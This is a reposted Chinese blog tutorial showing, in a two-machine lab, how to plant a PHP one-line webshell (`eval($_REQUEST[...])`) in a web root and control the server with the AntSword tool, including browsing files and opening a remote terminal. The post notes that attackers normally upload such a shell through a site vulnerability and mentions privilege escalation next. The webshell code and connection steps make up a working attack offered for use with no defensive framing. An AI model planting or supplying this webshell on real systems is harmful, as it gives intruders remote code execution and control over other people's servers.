当前位置:   article > 正文

蚁剑连接一句话木马演示_蚁剑一句话

蚁剑一句话

需要准备

一台虚拟机作为服务器,一台作为攻击机(可用主机),将虚拟机的网络都设置为桥接。

我这里服务器用win2008R2系统

攻击机用win10

接下来我会演示 php 的一句话木马

其他脚本语言的一句话木马使用过程和这个差别不大

在服务器上安装phpstudy 快速搭建服务器

安装成功后启动apache

尝试打开网站,看看是否成功

出现下面的页面代表成功

现在服务端就配置成功了

现在在攻击端安装菜刀,蚁剑等等类似工具,可以去看怎么安装蚁剑

安装中国蚁剑_undefine-CSDN博客

安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接)

输入服务器ip即可

查看服务器ip\

在win10中成功连接网站

正常情况下需要通过查找网站的漏洞,将一句话木马上传到网站上,但是呢我现在只是演示怎么使用一句话木马的,所以我直接将一句话木马复制到网站中,因为我搭建的网站是php,所以就用php的一句话木马,一句话木马还有asp,jsp之类的,不过不一定像php一样短

Php的一句话木马很简单,就是创建一个文本,写入

<?php eval($_REQUEST[123])?>即可

123就是你用来控制的密码,可以随便取

网上有很多,可以自己去查

将后缀改为.php即可

打开网站的根目录

将一句话木马放进去

要记住它的文件名还有路径,我这里放在根目录所以就不用记路径了,这点也说明了当你想尽办法把木马上传到网站的时候,却不知道它在哪里也是没有用的。

回到攻击端,打开蚁剑

右键空白区域

选择添加数据

然后输入一句话木马位置,和连接的密码,编码方式随便

点击测试连接,显示连接成功说明一句话木马可用

然后点添加就可以添加到目录了

双击即可查看对方目录

还可以右键目标打开终端,输入命令,不过能够用什么命令还得看你有什么权限,这就涉及提权了

还有很多的功能比如上传下载,不过这就要自己摸索,查看蚁剑的文档了

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/452907
推荐阅读
相关标签
  

闽ICP备14008679号